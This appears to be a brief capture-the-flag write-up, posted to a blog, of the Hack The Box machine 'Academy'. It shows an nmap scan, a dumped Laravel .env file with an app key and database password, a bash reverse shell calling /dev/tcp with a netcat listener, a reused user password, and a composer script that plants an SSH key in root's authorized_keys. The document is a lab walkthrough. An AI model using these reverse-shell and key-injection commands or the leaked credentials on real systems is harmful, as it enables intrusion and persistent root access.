# Academy By [Avalon](https://paragraph.com/@avalon-2) · 2021-12-01 --- # Nmap 7.91 scan initiated Sun Nov 29 13:49:16 2020 as: nmap -sC -sV -Pn -oA Academy 10.10.10.215 Nmap scan report for 10.10.10.215 Host is up (0.24s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA) | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA) |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://academy.htb/ 88/tcp filtered kerberos-sec Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Nov 29 13:54:29 2020 -- 1 IP address (1 host up) scanned in 312.78 seconds ### 修改Hosts 10.10.10.215 academy.htb ### 用户权限 ![](https://storage.googleapis.com/papyrus_images/d56756919285bb3045984b62dfd47f24d65d5625adb6d865ee135920ee784ee0.png) ### 再次修改Hosts 10.10.10.215 academy.htb dev-staging-01.academy.htb ### 进入[http://dev-staging-01.academy.htb](http://dev-staging-01.academy.htb) 发现关键词Laravel ------------ Command ~> cat /var/www/html/academy/.env APP_NAME=Laravel APP_ENV=local APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= APP_DEBUG=false APP_URL=http://localhost LOG_CHANNEL=stack DB_CONNECTION=mysql DB_HOST=127.0.0.1 DB_PORT=3306 DB_DATABASE=academy DB_USERNAME=dev DB_PASSWORD=mySup3rP4s5w0rd!! BROADCAST_DRIVER=log CACHE_DRIVER=file SESSION_DRIVER=file SESSION_LIFETIME=120 QUEUE_DRIVER=sync REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_DRIVER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1 MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" remote nc -l 1234 local bash -c 'bash -i >& /dev/tcp/10.10.15.XX/1234 0>&1' b11122e303dae8ceeee215804f60a119 ![](https://storage.googleapis.com/papyrus_images/c543e2014724ed3b3c6144baac5083eb17983bbd2887d9875cf2de251cc14775.png) ![](https://storage.googleapis.com/papyrus_images/c7d5136feb02215fcc0d6a420ce6f4aec66946b4523bb83fbb523169c5d03346.png) mrb3n\_Ac@d3my! { "scripts": { "command": "mkdir /root/.ssh; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTX2FPNH+e2PHPtZIpd6PxXZpZmKySBaSjpEftPu+dEEVRF/CNSn1GWtnCO4YjD0r3scAjMXFMWP0J17ibFR1SQ+x+DHKRubR/sh3ZH2BPr30yYPzC+TXHFELSiEvwllcfTCDTvmUzoposuC4wnuI/eaVDPRBzn3ke9zHI0WgbJxInjTYL2XElRg1NdwsihCK5HBZnfgNIrW8s+5J4G3DgF2Zl+1BOAd+CuNvEGSx/ZZPI2TGClJW1A+rVYJ+U5052kZQMvRzdB53vCagivIRYEkNacz33ztjbzR1sW6f5r7oMrOBw6KO75/8+PlcrvrtpPOX8sniX34C4w/KYooxJDc6HsiGDZHmFUq3eHpRvd6EG1JtPQQroiw+K/ajSORuMzfC+SSFVb8MumxBeI2n9yEmAhYaraAX2ZdP/YX0aQ8X4qddgS+5TPa1SGhhnUJuS0Ke7tX+Xtj/vP3QHcTjUVYj65rdk5iLfyPJZFUuAU+QiCuUfWEtwZy/f636yKhM= xiaming@bixin.cn' >> /root/.ssh/authorized_keys" } } ![](https://storage.googleapis.com/papyrus_images/93288b394c70248263a9965e9086a0dd4fd939fd1e9a5b2123771c63988c9f8b.png) ![](https://storage.googleapis.com/papyrus_images/fc00b66df193743541d3bfb6e4825a2016a784a1beb0617084c09f90defb5665.png) e8065ea83707204ed3f153f94cbddbb7 --- *Originally published on [Avalon](https://paragraph.com/@avalon-2/academy)*